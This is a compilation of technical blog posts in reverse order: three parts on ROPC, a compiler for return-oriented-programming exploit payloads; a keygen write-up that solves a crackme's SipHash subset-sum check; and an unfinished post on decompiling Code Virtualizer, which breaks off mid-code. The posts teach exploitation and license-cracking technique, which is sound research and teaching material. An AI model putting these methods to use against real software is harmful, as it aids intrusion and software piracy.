This is the third (and last) post in a series (first post here, second here) about ROPC, describing implementation of its features like tables, conditional jumps, recursive calls, etc. Please familiarize yourself with the two first posts, otherwise this one might be hard to follow.

After our ROP program finishes executing the **main** function, execution transfers to the first address encountered on the stack. This is problematic for a few reasons:

- if the implementation of a function **F** is present on the stack after the implementation of **main**, then the ROP program will start executing **F**, which contradicts our assumption that execution starts and ends in **main**,
- if the address after the implementation of **main** isn’t mapped in the process’ address space, then our target program terminates with an exception. On the other hand, if the address is mapped, the worst case scenario is that we start executing some **format_hard_drive()** function — we can’t predict what is going to happen.

Additionally, for ROP functions to be able to use the emulated stack, variables holding the stack top and the stack frame have to be initialized before entering **main**. The solution is to add an initialization procedure as a preamble to every compiled ROP program. This prologue will:

- initialize variables storing stack top and stack frame,
- copy contents of tables used in the ROP program to the target application’s data section,
- call the **main** function with the return address set to the very end of the ROP program.

Additionally, we add a special constant **CRASH_ADDR** at the end of the program. **CRASH_ADDR** is picked so that we are sure it’s an address that’s never mapped in the address space. This way the order of ROP functions on the stack doesn’t matter and execution terminates with an access violation while the processor tries to execute code stored under **CRASH_ADDR** — execution stops in a controlled manner.

All table assignments *tab=[1,2,…]* are replaced during AST rewriting with constant assignments *tab=ADDR*, where *ADDR* is the address where the wrapper prologue stored the table’s contents. At first glance this might seem like a waste of space, since we need a procedure in the preamble to store the table (one dword at a time) to a fixed (chosen during compilation) address in the process’ data section. The non-wasteful alternative, storing the table explicitly in the ROP payload, requires a gadget that copies the ESP register to another one. It’s necessary because the ROP program doesn’t know its memory location, so in order to reference a table in its body, it needs to know its own address. The space-wasting variant was chosen for its simplicity :).

All pseudoinstructions (see part 1) related to execution transfers make use of a symbolic constant *FromTo(A,B)*, which is replaced by the byte distance between labels A and B in the compiled payload. The distance is signed (*FromTo(A,B)=-FromTo(B,A)*), and since it’s just a difference of label positions, *FromTo(A,B)+FromTo(B,C)=FromTo(A,C)*.

The simplest way to implement conditional jumps is to use the **lahf** instruction. **lahf** copies some flags from the EFLAGS register to the upper byte of AX: AH := EFLAGS(SF:ZF:0:AF:0:PF:1:CF). Below is pseudocode showing how ROPC implements the instruction pair: cmp e1, e2; jXX jmp_lbl.

    [compute e1 and store the result in reg1]
    [compute e2 and store the result in reg2]
    Sub(reg3, reg1, reg2)
    SaveFlags                ;just lahf
    [set EAX=1 if and only if the jump's condition is met]
    SetSymbolic(reg4, FromTo('@@', jmp_lbl))
    Mul(EAX, EAX, reg4)
    OpEsp(Add, EAX)
    @@:

Pseudoinstruction (PI) *Sub* is used only to update *EFLAGS*. We can use subtraction instead of comparison (the x86 *cmp* instruction), because *cmp* performs the same subtraction, it just doesn’t save the result. The key is to ensure that *EAX==1* if and only if the jump’s condition is met — this way the multiplication works as a conditional assignment. Boolean conditions are easy to express when EAX holds the flags from EFLAGS.
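The multiplication trick can be sketched in a few lines (this is a model of the idea, not ROPC code):

```python
# EAX is forced to 0 or 1 by the condition, then multiplied by the jump
# distance, so adding the product to ESP either takes the jump or falls
# through to the @@ label.
def conditional_offset(cond_met, distance):
    eax = 1 if cond_met else 0   # [set EAX=1 iff the jump's condition is met]
    eax = eax * distance         # Mul(EAX, EAX, reg4)
    return eax                   # OpEsp(Add, EAX) adds this to ESP

assert conditional_offset(True, -0x40) == -0x40   # jump taken: ESP moves
assert conditional_offset(False, -0x40) == 0      # not taken: fall through
```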

For recursion to work we need a stack. Since the normal stack (pointed to by ESP) is already used, we need to emulate it using the data section of the targeted process.

We store two variables at the beginning of the data section: the current top of the emulated stack and the current stack frame. The prologue of the ROP payload initializes them with the end of the data section (the stack grows downwards). During execution of the payload these two variables are modified just like for the native x86 stack.

Below is the implementation of the *PushReg(reg)* pseudoinstruction. *ReadMemConst* and *WriteMemConst* take a memory address as a constant.

    ReadMemConst(reg0, STACK_PTR)
    WriteMem(reg0, reg)
    ReadMemConst(reg1, STACK_PTR)
    Set(reg2, 4)
    Sub(reg3, reg1, reg2)
    WriteMemConst(STACK_PTR, reg3)

The above pseudocode emulates the native *push* instruction:

- read the stack’s top from the STACK_PTR address and store it in reg0,
- store reg’s value to the address pointed to by reg0,
- read the stack top again, into reg1 (reg0 could have been overwritten),
- set reg2=4,
- compute reg3=reg1-reg2=[STACK_PTR]-4,
- update the top of the stack: [STACK_PTR]=[STACK_PTR]-4.
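The push sequence can be modeled in a few lines of Python (a hedged sketch; variable names and addresses are mine, not ROPC’s):

```python
# Emulated stack kept in the host's data section, modeled as a dict.
STACK_PTR = 0                  # address of the variable holding the stack top
mem = {STACK_PTR: 0x1000}      # data section; emulated stack top starts at 0x1000

def push_reg(value):
    top = mem[STACK_PTR]       # ReadMemConst(reg0, STACK_PTR)
    mem[top] = value           # WriteMem(reg0, reg)
    mem[STACK_PTR] = top - 4   # Sub + WriteMemConst: [STACK_PTR] -= 4

push_reg(0xdeadbeef)
assert mem[0x1000] == 0xdeadbeef   # value landed at the old top
assert mem[STACK_PTR] == 0xffc     # top moved down by one dword
```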

Pseudoinstructions *Pop*, *Leave*, *Enter*, *Ret* and *Call* are implemented in similar fashion.

ROPL code:

    call foo(a1, ..., an)
    after:

is expressed in pseudoinstructions as:

    [compute an and store the result in reg]
    PushReg(reg)
    ...
    [compute a1 and store the result in reg]
    PushReg(reg)
    Set(reg, FromTo(foo, after))
    PushReg(reg)
    Set(reg, FromTo(after, foo))
    OpEsp(Add, reg)
    after:

Computed parameters (a1,…,an) are stored on the emulated stack. After them, we store the signed distance between the labels *foo* and *after*. Then we jump to label *foo* — we offset *ESP* by the distance between *after* and *foo*.

After *foo* does its thing, it’s time to return to the label *after* (just past *OpEsp*). *Ret* pops the “return address” pushed by the *call* and adds to it the distance from itself to the label *foo*, obtaining the distance from itself to *after*. Indeed: *FromTo(ret,foo)+FromTo(foo,after)=FromTo(ret,after)*. Knowing this distance, *Ret* can jump back to *after* and exit the current function :).
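The offset arithmetic checks out numerically (label offsets below are invented for the example):

```python
# Byte positions of labels in a hypothetical compiled payload.
offsets = {'foo': 0x20, 'after': 0x60, 'ret': 0x80}

def from_to(a, b):
    # signed distance between labels: FromTo(A,B) = -FromTo(B,A)
    return offsets[b] - offsets[a]

# Ret adds FromTo(ret, foo) to the pushed FromTo(foo, after),
# obtaining FromTo(ret, after), the distance it must add to ESP:
assert from_to('ret', 'foo') + from_to('foo', 'after') == from_to('ret', 'after')
assert from_to('foo', 'after') == -from_to('after', 'foo')
```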

ROPC uses the application’s import table for calling OS functions. This solution is simple to implement, but limits the power of expression if the import section contains a small number of functions.

In order to call an import, we need to:

- save its parameters on the native stack,
- save the return address on the native stack,
- make sure the import’s local variables don’t overwrite our ROP payload.

The easiest way to fulfill all of the above conditions is to invoke the OS function from the application’s data section, instead of the native stack. We copy the import calling stub to the data section and then jump to it. This way we are able to provide the return address (since we know the address of the stub in .data) and don’t need to worry about the import’s local variables.

ROPC is impractical because of the size of the code it generates. An attacker’s goal is to take control of the victim’s machine, not to compute Fibonacci numbers ;). Conditional jumps and recursion are not necessary to spawn a shell.

A useful continuation of ROPC would be a tool that finds a sequence of gadgets (as short as possible) able to run a piece of native code given as a parameter. At the moment, tools that do this (like *mona.py*) use heuristics and don’t guarantee the semantics of the sequences they find.

This is the second post in a series (first post here) describing ROPC. Programs accepted by the compiler are written in ROPL (**R**eturn **O**riented **P**rogramming **L**anguage). ROP programs are usually used as stage 0 payloads: they compute addresses, change memory protections, and call a few OS APIs. For this reason, the language expressing them doesn’t have to be complex.

Grammar for QooL (language accepted by the Q compiler [0]) is shown below.

    (exp)  ::= LoadMem (exp) (type)
             | BinOp (op) (exp) (exp)
             | Const (value) (type)
    (stmt) ::= StoreMem (exp) (exp) (type)
             | Assign (var) (exp)
             | CallExternal (func) (exp list)
             | Syscall

QooL is simple but sufficient for stage 0 functionality. ROPC has to support conditional jumps and local function invocations, so it’s more complex.

Sample program in ROPL computing first few elements of the Fibonacci sequence:

    fun fib(n, out){
        x = 0
        y = 0
        cmp n, 0
        je copy
        cmp n, 1
        je copy
        fib(n-1, @x)
        fib(n-2, @y)
        [out] = x+y
        jmp exit
    copy:
        [out] = n
    exit:
    }

    fun main(){
        fmt = "%d\n"
        i = 0
        x = 0
    print:
        fib(i, @x)
        !printf(fmt, x)
        i = i+1
        cmp i, 11
        jne print
    }

The sample above makes use of all of the features of ROPL:

- functions,
- function calls,
- native function calls (like invoking printf),
- local variables,
- labels and conditional jumps,
- address operator @,
- dereference operator [],
- arithmetic and comparison ops.

**Design considerations**

On the “high levelness” scale of languages, we can put ROPL below C but above ASM. The implementation was simplified by a few assumptions:

- all variables are unsigned 32 bit numbers,
- reading and writing from/to memory is restricted to 32 bit values (you can’t “natively” write a byte),
- all variables are stored in memory (registers are used as temporary variables, they never store local vars permanently),
- every function is treated as recursive, so local vars are always stored on the emulated stack instead of a constant place in memory.

**Syntax**

You can read the full grammar here. Most important features below.

Arithmetic operators:

- addition,
- subtraction,
- multiplication,
- division,
- negation.

Bitwise operators:

- and,
- or,
- xor,
- not.

Comparison operators:

- equality,
- greater than,
- lower than,
- negations of the three above.

All operators should be treated as their unsigned C equivalents. Function parameters are always passed by value. Since ROPL functions never return anything (in the same sense as void functions in C), it’s necessary to use pointers to get results out of procedures. “@” is the “address of” operator. Below is a usage example:

    fun foo(x){
        [x] = 1
    }

    fun main(){
        x = 0
        foo(@x)
        #here x=1
    }

foo gets a pointer to x. The dereference operator [] interprets x as a memory address at which to store a constant. On exit from foo, x=1.

**Invoking native functions**

For ROP programs to print their results or influence the OS in interesting ways, they have to be able to call native OS functions. In ROPL native function calls are preceded by an exclamation mark:

    fun main(){
        x = 0
        fmt = "%d\n"
        !printf(fmt, x)
    }

The above example will compile only if printf is found in the import table of the target executable.

**Strings**

Strings in ROPL are syntactic sugar. During parsing, the instruction fmt = “%d\n” is replaced with fmt = [37, 100, 10, 0] (the values in the table are the ASCII codes of “%d\n”).
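The desugaring is a one-liner (a sketch of the transformation, not ROPC’s actual parser code):

```python
# String literal -> zero-terminated table of ASCII codes.
def desugar_string(s):
    return [ord(c) for c in s] + [0]

assert desugar_string("%d\n") == [37, 100, 10, 0]
```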

**Fin**

The last post will discuss the actual implementation of ROPL constructs like tables, jumps, recursive calls, the emulated stack, etc. Stay tuned.

This is a long overdue post describing ROPC (**R**eturn **O**riented **P**rogramming **C**ompiler, available here: https://github.com/pakt/ropc) with its own “higher level” language and features like conditional jumps, loops, functions (even recursive ones), tables, etc. ROPC was released in 2012. Since then, Christian Heitman has made a fork [0] capable of compiling ROP programs expressed in C (!).

Let’s consider a simple example to refresh our understanding of ROP. Below is a short snippet of assembly with a few gadgets.

    start_rop: ret
    set_eax:   pop eax
               ret
    set_ebx:   pop ebx
               ret
    write_mem: mov [eax], ebx

We want to write value X to address ADDR, using only the gadgets we see above. One possible stack arrangement is:

| Address | Value     |
|---------|-----------|
| ESP+0   | set_ebx   |
| ESP+4   | X         |
| ESP+8   | set_eax   |
| ESP+12  | ADDR      |
| ESP+16  | write_mem |

Assuming that EIP=start_rop and stack memory is arranged as above, here’s what happens:

- First RET transfers execution to set_ebx
- POP EBX loads X and saves it to EBX
- RET transfers exec. to set_eax
- POP EAX loads ADDR and saves it to EAX
- RET transfers exec. to write_mem
- MOV [EAX], EBX writes X under ADDR
- the last RET transfers exec. to an undefined address

This was a really simple example, so creating the ROP program was easy, even by hand. Real world exploits are much more complex, and in the case of large applications (like Firefox) with a large number of gadgets, it’s not clear how to implement the desired functionality “manually”, just by staring at IDA :).

Q [1] was the first tool which did not require any human interaction to compile a ROP program. Before Q, the most advanced was Roemer’s compiler [2], but it required some level of interaction — the gadget database had to be constructed manually.

ROPC is based on Q. Since Q’s code isn’t available, parts of its functionality were implemented from scratch. ROPC searches, classifies and verifies gadgets just like Q. The set of gadget types used to express more complex operations is almost the same as in Q. That’s where the similarities end. ROPL (**R**eturn **O**riented **P**rogramming **L**anguage ;)) is higher level and more advanced than QooL: it can express conditional jumps and procedures, even recursive ones.

ROPC also includes some new ideas / solutions:

- compilation based on pseudoinstructions,
- solving technical problems with stack emulation for ROP programs,
- expressing recursive procedures.

ROPC uses two tools:

- BAP
- STP

**BAP** [3] (Binary Analysis Platform) is a framework (written in OCaml) for binary code analysis. BAP first disassembles the given code and then converts it to BIL (BAP’s intermediate language). BIL is easier to manipulate than assembly, because:

- it has fewer instructions,
- side effects (like EFLAGS mutations) are expressed explicitly.

ROPC uses a small subset of BAP’s capabilities:

- lifting from x86 to BIL,
- BIL emulation,
- converting BIL to a format digestible by STP.

If you want to do any kind of binary analysis there is a very good chance that BAP already does what you plan to implement. Seriously, use BAP :P.

**STP** [4] is an SMT solver. For our application, it’s just a black box that answers questions about code semantics. BAP provides an API for querying STP (and other solvers) about BIL, so it’s easy to formulate questions about code and get answers from STP. The questions asked by ROPC concern hypotheses about the code’s functionality. For example, we might be interested in whether it is always true that, after executing a particular piece of code, the final value of EBX is equal to the starting value of EAX. If STP answers YES, then we can be sure that the analyzed snippet is “semantically equivalent” to MOV EBX, EAX.

Programs generated by ROPC consist of a sequence of gadgets. It’s useful to think of gadgets as instructions of a very simple assembly language.

The table above describes all gadget types recognized by ROPC. *X ← Y* denotes the assignment of Y to X, *∘* denotes a binary arithmetic or logical operation, [X] denotes the 32-bit value in the memory cell at address X, and Lahf copies the processor flags to the AH register.

For a given target app (we will call it the “host”) we first have to construct a gadget database. This process is described in the Q paper, so I won’t repeat it here.

Having the gadget db, the compiler can start consuming the ROPL source. From a parsed program in AST (abstract syntax tree) form, there’s a long way to a binary (compiled) result. Even a simple instruction like x=a+1 is complex to implement if all we can operate with are gadgets:

- we need to load r1 register (abstract for now) with the value of local variable a
- set register r2 to 1
- calculate r3 = r1+r2
- write r3 to local variable x

Every read and write from/to a local variable also requires a few gadget operations. Since gadget implementations of ROPL instructions are long, ROPC uses a higher level construct called pseudoinstructions (**PI**). PI are “parametrized macros” that allow complex operations to be expressed succinctly. PI can take multiple types of parameters:

- symbolic registers (abstract variable that can be set to any concrete register),
- concrete registers (EAX, EBX, etc),
- numerical constants.

The table above describes a simplified set of PI, used to explain the inner workings of the compiler. The set used by ROPC is more complex, but the idea is the same. [[R]] means the concrete register assigned to symbolic register R. locals(Var) is the memory address of local variable Var. The ReadLocal and WriteLocal implementations are omitted, since they are quite long.

Every ROPL instruction has its implementation in PI. For example, x=a+1 can be implemented as:

    ReadLocal(r1, a)
    Set(r2, 1)
    Add(r3, r1, r2)
    WriteLocal(x, r3)

During compilation, ROPC first rewrites instructions from the source into PI sequences and then tries to unroll them into sequences of gadgets by assigning concrete registers to symbolic ones (r1, r2, r3 in the example above). If unrolling succeeds, the sequence of gadget addresses is written to the output file as the compiled result.

The compiler consists of three parts:

- candidate generator (CG),
- verifier (VER),
- the actual compiler (COMP).

CG and VER work exactly the same way as in Q, so I won’t repeat the details here. Together, they are able to construct a gadget database with verified semantics. Found gadgets are guaranteed to work exactly as advertised by their type and not crash :). VER additionally provides ROPC with a set of registers modified during gadget execution.

Below are diagrams providing a very high level overview of how components work together.

ROPL source is parsed to produce an Abstract Syntax Tree representation of the program. Syntactically correct programs can be semantically incorrect, so we need to run some checks. The **AST verification** stage checks that:

- variables are initialized before use,
- jumps jump to defined labels,
- all invoked functions are defined,
- function names are unique,
- there is a “main” function,
- functions are called with correct number of arguments.

If a program fails any of the above checks, it’s rejected as invalid and compilation terminates.

**AST simplification** massages the tree to make it easier to process. This is done by converting complicated expressions to three address code [5]. For example, x=a+b+c is split (simplified) into two instructions: [t=a+b, x=t+c]. After this step, all trees describing arithmetic operations have depth at most 1. The price for this simplification is an increased number of temporary local variables (like ‘t’ in the previous example).
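The flattening can be sketched in a few lines (my own sketch, not ROPC’s OCaml; nested tuples stand in for the AST):

```python
# Flatten an expression tree into three-address code, inventing a fresh
# temporary for every intermediate result.
def flatten(expr, dst, counter=None):
    """expr is a variable name (str) or an (op, lhs, rhs) tuple."""
    counter = counter if counter is not None else [0]
    if isinstance(expr, str):
        return [], expr
    op, lhs, rhs = expr
    code_l, l = flatten(lhs, None, counter)
    code_r, r = flatten(rhs, None, counter)
    if dst is None:                     # intermediate result: new temporary
        dst = 't%d' % counter[0]
        counter[0] += 1
    return code_l + code_r + [(dst, op, l, r)], dst

code, _ = flatten(('+', ('+', 'a', 'b'), 'c'), 'x')
# x = a+b+c becomes: t0 = a+b; x = t0+c
assert code == [('t0', '+', 'a', 'b'), ('x', '+', 't0', 'c')]
```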

**AST rewriting** converts ROPL instructions to sequences of pseudoinstructions. The ROPL instruction “cmp” is a good example. To compare the arguments, it’s necessary to compute them, save them to registers, subtract these registers and then save the EFLAGS contents to the AH register. The PI implementation of “cmp v1,v2” is:

    ReadLocal(reg1, v1)
    ReadLocal(reg2, v2)
    Sub(reg3, reg1, reg2)
    SaveFlags

During this stage all instructions are expanded into PI sequences. Next stages operate only on PI lists.

This is the most complex step of the compilation process. To unroll a list of PI into a list of gadgets, it’s necessary to assign concrete x86 registers to all symbolic registers. The problem is that some assignments will not work: because of gadget side effects (modified registers), and because not every assignment is possible. We will call an assignment (a function from symbolic registers to concrete ones) correct if (and only if) it’s possible (with a particular gadget database) and it preserves semantics. Here’s an example illustrating these two problems:

    load_eax: pop eax
              ret
    load_ebx: pop ebx
              mov eax, 0
              ret
    load_ecx: pop ecx
              ret
    add1:     add eax, ebx
              ret
    add2:     add eax, ecx
              ret

Assuming the above is our host app, how do we assign concrete regs in this sequence of PI:

    Set(r1, 1)
    Set(r2, 2)
    Add(r3, r1, r2)

The assignment [[r1]]=ESI (with [[r2]], [[r3]] anything) is not possible, because no gadget is able to set ESI=1. The assignment [[r1]]=EAX, [[r2]]=EBX, [[r3]]=EAX is possible, but does not preserve semantics, since the load_ebx gadget modifies EAX. A correct (so possible and semantics preserving) assignment is [[r1]]=[[r3]]=EAX, [[r2]]=ECX.

To express these observations more formally, we can say that for every gadget G(r1,..,rn) (r1,..,rn are symbolic) the assignment must guarantee that G([[r1]], …, [[rn]]) belongs to the set returned by VER. It must also ensure that if [[r]]=CONCRETE_REG, then CONCRETE_REG isn’t modified between writing and reading r (so it has to be liveness [6] preserving).

The number of possible assignments is exponential, but we can speed up the naive search by observing that there’s no point in checking assignments which do not meet the above criteria (availability and liveness preservation).
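To make the search concrete, here’s a toy backtracking sketch (all data and names are invented, this is not ROPC code): every symbolic register has an “available” set, and two symbolic registers whose live ranges overlap must not share a concrete register.

```python
# Availability sets and liveness conflicts for the example are made up.
available = {'r1': {'eax'}, 'r2': {'ebx', 'ecx'}, 'r3': {'eax'}}
conflicts = {('r1', 'r2'), ('r2', 'r3')}   # overlapping live ranges

def assign(symbolic, picked=None):
    picked = {} if picked is None else picked
    if not symbolic:
        return dict(picked)
    r, rest = symbolic[0], symbolic[1:]
    for c in sorted(available[r]):
        clash = any(pc == c and ((r, s) in conflicts or (s, r) in conflicts)
                    for s, pc in picked.items())
        if clash:
            continue               # sharing c would violate liveness
        picked[r] = c
        solution = assign(rest, picked)
        if solution:
            return solution
        del picked[r]
    return None

sol = assign(['r1', 'r2', 'r3'])
# r1 and r3 may share EAX because their live ranges don't overlap here
assert sol == {'r1': 'eax', 'r2': 'ebx', 'r3': 'eax'}
```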

Registers available for gadget arguments are provided “for free” by VER. In the case of PI, we can use their expansions. Let PI *P* expand to gadgets *G1, …, Gn*. Then the set of registers available for *P* is the intersection of the sets available for *G1, …, Gn*: if a symbolic register *r* is used as an argument by two of these gadgets, it has to belong to the “available” sets of both.

After performing liveness analysis on the ROPL source in PI form, for every pseudoinstruction we get a set of symbolic registers which are “live” during its execution. These sets provide two important pieces of information: which registers can’t be modified and which registers can’t share a concrete register.

The set of registers modified during gadget execution (as a side effect) is provided by CG and verified by VER, so we can be sure it’s correct.

Having information about possible assignments, liveness and assignment conflicts, we can generate all legal assignments and check them one by one, until we find the one which can be fulfilled using the gadget database.

The implementation of jumps is based on modifying ESP by a constant equal to the distance between the jump instruction and the target label: ESP += C. This constant isn’t known until all PI are expanded to a sequence of gadgets. Only then, by summing their sizes (how much space they take on the stack), can we calculate the needed offset.

Concretization is the last stage before producing the final ROP payload. The only thing that changes during this stage is the SetSymbolic(reg, S) pseudoinstruction, where reg is a concrete register and S is a symbolic constant expressing the distance between two labels. After computing the concrete value of S (say S=C), SetSymbolic(reg, S) changes to Set(reg, C).

I hope this post was useful. Please post any questions in the comments. Next part will discuss ROPL syntax and capabilities :).

0 – https://github.com/programa-stic/ropc-llvm

1 – http://users.ece.cmu.edu/~ejschwar/papers/usenix11.pdf

2 – http://cseweb.ucsd.edu/~hovav/dist/rop.pdf

4 – https://sites.google.com/site/stpfastprover/


To see that, let *p(n) = 1 − q(n)*, where *p(n)* is the probability of encountering at least one pair of equal birthdays in a group of *n* people. *q(n)* is the probability that in a group of *n*, birthdays are pairwise different. Assuming there are 365 days in a year, *q(2) = 364/365* — the first person is free to have any birthday, the second one can pick any day from the remaining 364. By generalizing this reasoning, we arrive at: *q(n) = (364/365)·(363/365)·…·((365−n+1)/365) = 365!/(365^n·(365−n)!)*, for *n ≤ 365* (for *n > 365*, *q(n) = 0*).
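As a sanity check, here’s a direct computation of the exact probability that n birthdays are pairwise different, and its complement:

```python
# q(n): all n birthdays distinct; p(n) = 1 - q(n): at least one shared pair.
def q(n, days=365):
    if n > days:
        return 0.0
    prob = 1.0
    for k in range(n):
        prob *= (days - k) / days
    return prob

def p(n, days=365):
    return 1.0 - q(n, days)

assert abs(q(2) - 364 / 365) < 1e-12
assert p(22) < 0.5 < p(23)   # the classic threshold: 23 people suffice
```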

The graph above shows how quickly *p(n)* rises.

If we replace birthdays with values of a hash function *H*, the birthday paradox provides a way to find collisions for *H*. The algorithm is quite simple:

**CHECK-IF-COLLISION-EXISTS(k, H):**

0. *S = ∅*, *i = 0*,
1. pick a random *x* (without repetition) and compute *h = H(x)*,
2. if *h ∈ S*, return *YES*,
3. *S = S ∪ {h}*,
4. *i = i + 1*,
5. if *i < k*, goto 1, else return *PROBABLY NOT*.

The algorithm runs in *O(k)*, but this by itself isn’t really useful — we want the complexity parametrized by the probability of finding a collision. The formula for *p(n)* isn’t easily invertible, so we need to approximate it by something simpler. One easy to derive approximation is *p(n) ≈ 1 − e^(−n(n−1)/(2·365))* (see [0]), so *q(n) ≈ e^(−n(n−1)/(2·365))*.

We can extend this reasoning and conclude that if there are *m* “days” and *n* persons, then the probability that at least two of them have the same birthday is *p(n; m) ≈ 1 − e^(−n(n−1)/(2m))*. Now, if we assume that *m* is equal to the size of the image of our hash function, then by inverting the formula for *p* (see [1]), we get *n(p; m) ≈ sqrt(2m·ln(1/(1−p)))*, where *p* is the desired probability of collision. For *p = 0.5*, *n ≈ 1.1774·sqrt(m)*. This approximation shows that for (for example) MD5, CHECK-IF-COLLISION-EXISTS would loop around *2^64* times (MD5 hashes are 128 bits long) and return YES with probability 0.5.
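The standard birthday-attack estimate *n(p) ≈ sqrt(2·m·ln(1/(1−p)))* (see [1]) is easy to check numerically:

```python
import math

# Approximate number of hash evaluations needed for collision probability p
# over an image of size m.
def n_for_probability(p, m):
    return math.sqrt(2 * m * math.log(1.0 / (1.0 - p)))

# for p = 0.5 this reduces to sqrt(2*ln 2)*sqrt(m), about 1.1774*sqrt(m)
assert 22 < n_for_probability(0.5, 365) < 23
# a 128-bit hash needs on the order of 2**64 evaluations for a 50% chance
assert 2**64 < n_for_probability(0.5, 2**128) < 2**65
```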

There are multiple generalizations of this problem, but we are interested in a result of David Wagner from 2002 [2]. Citing from the paper’s abstract:

*“We study a k-dimensional generalization of the birthday problem: given k lists of n-bit values, find some way to choose one element from each list so that the resulting k values xor to zero. For k = 2, this is just the extremely well-known birthday problem, which has a square-root time algorithm (…). In this paper, we show new algorithms for the case k > 2: we show a cube-root time algorithm for the case of k = 4 lists (…).”*

For details, see the paper [2]. Key observations from our point of view are:

- algorithm for k=4 runs in cube-root time,
- xor can be replaced by addition modulo a power of 2.

Armed with this knowledge, we can take a look at the problem from KeygenMe3 by Dcoder [5].

Here’s a high-level pseudocode of the protection scheme:

    sum = 0
    name_hash = hash(name)
    for i in 0..15:
        x = (i<<8) | serial[i]
        sn_hash = hash(x)
        sum += sn_hash
    if(sum == name_hash) good
    else bad

The hash function used is SipHash [3], a lightweight PRF (pseudorandom function).

You might recognize the problem stated by Dcoder as the subset sum problem (SUM) [4]. SUM is NP-complete and it’s unknown whether there is a polynomial time algorithm that solves it exactly. The best exact general-case algorithm has complexity *O(2^(n/2))*, where *n* is the size of the set we can pick numbers from. In our case *n = 16·256 = 4096*, which makes *2^(n/2)* prohibitively large.

There’s a probabilistic algorithm (described in [2]) that solves SUM in *O(2^(b/3))* time, where *b* is equal to the bit size of the numbers used. In our case *b = 64* bits, so *2^(b/3) ≈ 2^22*. The algorithm takes 4 lists of numbers: *L1*, *L2*, *L3*, *L4* and returns a set of tuples *(x1, x2, x3, x4)*, *xi ∈ Li*, where *x1 + x2 + x3 + x4 = 0*. The only requirement is that we can ‘extend’ all lists freely. All details are clearly explained in [2], so I won’t repeat them here.

At first sight, there are few problems:

- we have 16 lists of numbers, instead of 4 (there are 16 bytes in a serial),
- each of our 16 lists contains exactly 256 numbers (each one of 16 positions can take one of 256 possible values),
- the target sum is (almost always) nonzero.

We can deal with 1 and 2 by observing that instead of working with 16 lists, we can work with 4 lists containing random 4-element sums: *L1’* will contain 4-sums of elements from *L1, L2, L3, L4*, *L2’* 4-sums of elements from *L5, L6, L7, L8*, etc. Solving SUM for *L1’, …, L4’* solves it for *L1, …, L16*, because if *yi ∈ Li’* and *y1 + y2 + y3 + y4 = 0*, then every *yi* is a sum of four elements *xj ∈ Lj*, so *x1 + x2 + … + x16 = 0*.
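A sketch of this reduction (list sizes are from the problem; the 2^64 modulus matches 64-bit SipHash sums, and the helper names are mine):

```python
import random

MOD = 2**64   # sums are taken modulo 2**64

# Build `count` random 4-sums from a group of four lists; each combined
# element remembers which four originals produced it, so a solution over
# the combined lists can be unpacked into one over all 16.
def combine(group_of_four, count):
    out = []
    for _ in range(count):
        picks = [random.choice(lst) for lst in group_of_four]
        out.append((sum(picks) % MOD, picks))
    return out

lists16 = [[random.randrange(MOD) for _ in range(256)] for _ in range(16)]
# L1' from L1..L4, L2' from L5..L8, etc.
lists4 = [combine(lists16[i:i + 4], 1000) for i in range(0, 16, 4)]

s, picks = lists4[0][0]
assert s == sum(picks) % MOD and len(picks) == 4
```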

Problem 3 is easily dealt with by observing that subtracting a constant from all elements of a single list is equivalent to solving SUM for a nonzero sum. Indeed: *x1 + x2 + x3 + (x4 − C) = 0* implies *x1 + x2 + x3 + x4 = C*. Here, *C* is the target sum, subtracted from list number 4.

Keygen sources are available here. 4sum.py is an easy to read implementation of the original algorithm from [2]. sum4.c is the actual keygen source. It should compile without any warnings with ‘make’.

0 – http://en.wikipedia.org/wiki/Birthday_problem

1 – http://en.wikipedia.org/wiki/Birthday_attack

2 – http://www.cs.berkeley.edu/~daw/papers/genbday-long.ps

3 – https://131002.net/siphash/

4 – http://en.wikipedia.org/wiki/Subset_sum_problem

5 – http://crackmes.us/read.py?id=611

*Code Virtualizer is a powerful code-obfuscation system that helps developers protect their sensitive code areas against Reverse Engineering while requiring minimum system resources.*

*Code Virtualizer can generate multiple types of virtual machines with a different instruction set for each one. This means that a specific block of Intel x86 instructions can be converted into a different instruction set for each machine, preventing an attacker from recognizing any generated virtual opcode after the transformation from x86 instructions.*

This post describes DeCV — a decompiler for Code Virtualizer.

This is a high-level description. For a detailed discussion of CV internals see “Inside Code Virtualizer” by scherzo [6].

CV obfuscates the original x86 code by translating it to a custom stack-oriented language [1]. CVL (CV’s language) has around 150 instructions, but a lot of them are byte/word/dword variants of the same operation.

For example, consider this simple x86 code:

xor eax, 1111h

Its equivalent in CVL is:

    load ptr eax
    store addr
    load dword [addr]
    load dword 0x1111
    xor dword
    store dword eflags
    load ptr eax
    store addr
    store dword [addr]

To emulate x86 registers, CVL uses a table. Each dword in this table corresponds to one x86 register, so ‘*load ptr <reg>*‘ places a pointer to the variable holding <reg>’s value on the stack.

‘*store addr*‘ pops a value from the stack and places in a ‘built in’ variable called ‘addr’.

‘*load dword [addr]*‘ pushes a dword pointed by ‘addr’ on the stack.

The cumulative effect of the three instructions above is to push the value of eax on the stack.

Let’s emulate the rest of the code:

| Instruction        | Stack                    |
|--------------------|--------------------------|
| load dword 0x1111  | eax                      |
| xor dword          | eax, 0x1111              |
| store dword eflags | eax ^ 0x1111, new_flags  |
| load ptr eax       | eax ^ 0x1111             |
| store addr         | eax ^ 0x1111, ptr eax    |
| store dword [addr] | eax ^ 0x1111             |
| --                 | -                        |

Notice that ‘xor’ pushes two values on the stack: the xor’s result and the new value of EFLAGS register.

In order to recover the original x86 code, it’s sufficient to emulate CVL’s execution using symbolic registers instead of concrete values and emit x86 assembly on instructions like ‘store dword [addr]’. For example, if ‘addr’ equals ‘eax’ and there is ‘eax XOR ebx’ on top of the stack, the instruction to emit is ‘xor eax, ebx’. This is tree munching in disguise, btw [2].
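A toy symbolic evaluator (my own sketch, not DeCV’s code) illustrates the idea on the snippet above: registers stay symbolic strings, so ‘store dword [addr]’ reveals the recovered operation.

```python
# Minimal symbolic interpreter for a handful of CVL-like instructions.
def run(program):
    stack, addr, emitted = [], None, []
    for op, arg in program:
        if op == 'load_ptr':          # push pointer to <reg>'s slot
            stack.append(('ptr', arg))
        elif op == 'store_addr':      # addr = pop()
            addr = stack.pop()
        elif op == 'load_mem':        # push dword pointed to by addr
            stack.append(addr[1])     # symbolically: the register itself
        elif op == 'load_const':
            stack.append(hex(arg))
        elif op == 'xor':
            b, a = stack.pop(), stack.pop()
            stack.append('%s ^ %s' % (a, b))
            stack.append('flags')     # xor also pushes the new EFLAGS
        elif op == 'store_eflags':
            stack.pop()
        elif op == 'store_mem':       # this is where x86 would be emitted
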